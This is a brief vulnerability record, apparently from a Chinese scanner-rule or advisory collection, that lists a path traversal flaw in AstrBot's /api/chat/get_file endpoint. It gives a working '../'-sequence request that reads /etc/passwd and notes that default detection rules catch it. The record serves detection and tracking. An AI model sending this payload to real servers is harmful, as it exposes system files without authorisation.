vendor = "AstrBot"
name = "AstrBot路径遍历"
type = "信息泄露"
version = "未知"
path = "/api/chat/get_file"
detail = "/api/chat/get_file?filename=../../../../../../../etc/passwd"
fix = "缺省规则可检出"
date = "0729"
label = "1day"
verifier = "AdySec"
